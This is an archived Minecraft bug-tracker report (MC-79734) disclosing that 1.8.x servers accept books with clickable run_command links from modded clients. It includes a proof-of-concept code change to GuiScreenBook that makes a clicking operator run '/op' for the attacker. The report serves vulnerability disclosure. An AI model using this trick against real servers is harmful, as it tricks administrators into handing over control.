Mojira Archive
MC-79734

Server accepting clickable commands in books from malicious clients causing server owner OPing player

A modded client is able to send raw JSON data for books. A malicious person might use this to create a book, with run_command: /op Tibi. And then give it to an operator which in turn might get fooled to press on the link.

A vanilla server doesn't block these books.

Example of malicious use:
With Minecraft Coder Pack I can add a line in the GuiScreenBook around the part where it loops through all pages to add a run_command in the sendBookToServer(boolean) method.

GuiScreenBook.java
// MCP names
  private void sendBookToServer(boolean p_146462_1_) throws IOException {

  // *snip*

  for (int var3 = 0; var3 < this.bookPages.tagCount(); ++var3) {
    String var4 = this.bookPages.getStringTagAt(var3);
    ChatComponentText var5 = new ChatComponentText(var4);

    var5.setChatStyle(new ChatStyle().setChatClickEvent(new ClickEvent(ClickEvent.Action.RUN_COMMAND, "/op Tibi")));    // Added malicious line

    var4 = IChatComponent.Serializer.componentToJson(var5);
    this.bookPages.set(var3, new NBTTagString(var4));
  }

In the above example I can make a book saying: 'Click here for cookies' and then give it to an OP and when he clicks I'm OP.

Awaiting Response

Tibo

2015-04-19, 07:14 PM

2023-06-14, 12:42 PM

2018-10-02, 11:25 PM

0

3

Community Consensus

Minecraft 1.8.1 - Minecraft 1.8.8Minecraft 1.8.1, Minecraft 1.8.3, Minecraft 1.8.4, Minecraft 1.8.5, Minecraft 1.8.6, Minecraft 1.8.7, Minecraft 1.8.8

-